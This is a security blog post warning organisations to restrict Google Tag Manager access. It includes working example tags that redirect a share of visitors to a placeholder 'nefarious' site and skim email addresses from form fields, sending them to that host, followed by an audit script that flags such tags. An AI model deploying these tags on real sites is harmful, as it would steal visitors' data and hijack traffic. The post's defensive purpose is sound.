Why you need to keep access to your Google Tag Manager to a minimum

There are lots of potential 3rd parties who might need to add tracking tags to your website, for example:

  • Marketing agencies
  • Creative agencies
  • Data analysts
  • UX experts
  • Developers

Google Tag Manager is a great tool to centralise and streamline these tags, but we often see organisations grant these 3rd parties direct access to their Google Tag Manager account. While this might be OK if you are a small organisation that works with one 3rd party, you should definitely avoid it if your organisation is any bigger.

One potential issue with having multiple parties make their own changes is that they might not follow your established conventions. We often see third parties reinvent the wheel, add redundant tags or add the wrong tags. As well as potentially not working, these tags can affect other tracking, or even your whole website (to say nothing of unnecessarily adding to browser load times).

But the biggest reason to keep access to a minimum is security. That’s not to say your providers are dodgy, but every new account with access is an account that can be hacked by someone else. Most people aren’t aware how much damage can be done to your website from inside GTM, so here are a few examples that will hopefully scare you into doing a security audit.

I can deploy this tag on your website to make the background green:

<div class="code-to-copy"><pre><code>
<style>
  body {background-color:green !important}
</style>
</code></pre></div>

I can deploy this tag on your website to just redirect users to my nefarious website. I can even do it 10% of the time so that it would take much longer to be discovered. As you can see it’s not a lot of code:

<div class="code-to-copy"><pre><code>
<script>
  if(Math.random()*10<1)window.location.replace("http://nefariouswebsite.com");
</script>
</code></pre></div>

Let’s do worse. This tag will grab any email address entered into any email form field on your website and send the email address to the nefarious website. Again, we are showing this to highlight how trivial it is:

<div class="code-to-copy"><pre><code>
<script>
  //Define which fields look like email address fields on the page
  var css = "input[type*=email],input[class*=email],input[name*=email],*[class*=email] input";

  //Grab these fields off the page
  var myFields = document.querySelectorAll(css);    

  //Go through each field and execute a function whenever the user leaves a field
  for(var j=0;j<myFields.length;j++)myFields[j].addEventListener("blur", fetchData.bind(null),false);
	
  //The function that gets executed: grab the field's value and send an HTTP request to a nefarious
  //website with that value  
  function fetchData(e) {
    var email = e.target.value;
    var request = new XMLHttpRequest();
    request.open("GET", "https://nefariouswebsite.com/save-email.php?email="+email);
    request.send();
  }
</script>
</code></pre></div>

We won’t show the code for doing the same to a credit card number field but it’s not much different to the above!

So what can you do?

  1. Limit the number of accounts with GTM access
  2. Make sure any Google accounts with GTM access have 2-factor authentication enabled
  3. If you need to grant access, choose a level where they can only make changes but not publish them. This still leaves you with the ability to review the changes and decide whether or not they will be published.
  4. Document your GTM conventions/setup and share it with any 3rd parties and internal team members who might make changes.
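
To make the review in step 3 concrete, here is an added example (not part of the original article and not a Google tool) that scans an exported container for Custom HTML tags resembling the three snippets shown earlier. The export field names are assumptions about the container export format, and the allowlist, rules and sample container are constructed for illustration.

```javascript
// Added example: triage Custom HTML tags in an exported GTM container before publishing.
// Assumption: the export stores such tags as type "html", with the markup in the
// parameter whose key is "html". ALLOWED_HOSTS and RULES are illustrative, not exhaustive.
const ALLOWED_HOSTS = new Set(["www.googletagmanager.com", "www.google-analytics.com"]);

const RULES = [
  { id: "redirect", re: /location\s*\.\s*(?:replace|assign)\s*\(|location(?:\.href)?\s*=(?!=)/ },
  { id: "network-send", re: /XMLHttpRequest|\bfetch\s*\(|sendBeacon\s*\(/ },
  { id: "reads-form-field", re: /input\[|\.value\b/ },
  { id: "css-override", re: /<style[\s>]/i },
];

// Hosts referenced by the tag that are not on the allowlist.
function unlistedHosts(html) {
  const hosts = new Set();
  for (const m of html.matchAll(/\/\/([a-z0-9.-]+\.[a-z]{2,})/gi)) {
    const host = m[1].toLowerCase();
    if (!ALLOWED_HOSTS.has(host)) hosts.add(host);
  }
  return [...hosts];
}

// Returns one finding per Custom HTML tag that matches a rule or calls an unlisted host.
function auditContainer(exported) {
  const tags = (exported.containerVersion && exported.containerVersion.tag) || [];
  const findings = [];
  for (const tag of tags) {
    if (tag.type !== "html") continue; // only Custom HTML tags are inspected here
    const param = (tag.parameter || []).find((p) => p.key === "html");
    const html = param ? String(param.value) : "";
    const reasons = RULES.filter((r) => r.re.test(html)).map((r) => r.id);
    for (const h of unlistedHosts(html)) reasons.push("unlisted-host:" + h);
    if (reasons.length) findings.push({ tag: tag.name, reasons });
  }
  return findings;
}

// Constructed sample export (not real data); tag bodies mirror the snippets above.
const htmlParam = (value) => [{ type: "TEMPLATE", key: "html", value }];
const SAMPLE = { exportFormatVersion: 2, containerVersion: { tag: [
  { name: "Promo banner", type: "html", parameter: htmlParam('<script>if(Math.random()*10<1)window.location.replace("http://redirect.example");</script>') },
  { name: "Scroll event", type: "html", parameter: htmlParam('<script>window.dataLayer=window.dataLayer||[];dataLayer.push({event:"scroll_50"});</script>') },
  { name: "Form helper", type: "html", parameter: htmlParam('<script>var r=new XMLHttpRequest();r.open("GET","https://collector.example/save?email="+field.value);r.send();</script>') },
  { name: "GA4 page view", type: "gaawe", parameter: [] },
] } };

console.log(JSON.stringify(auditContainer(SAMPLE), null, 2));
```

Pattern matching like this is a triage aid for the human review in step 3. A clean result does not prove a tag is safe, since script can be obfuscated or loaded from an allowed host.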

Good luck!
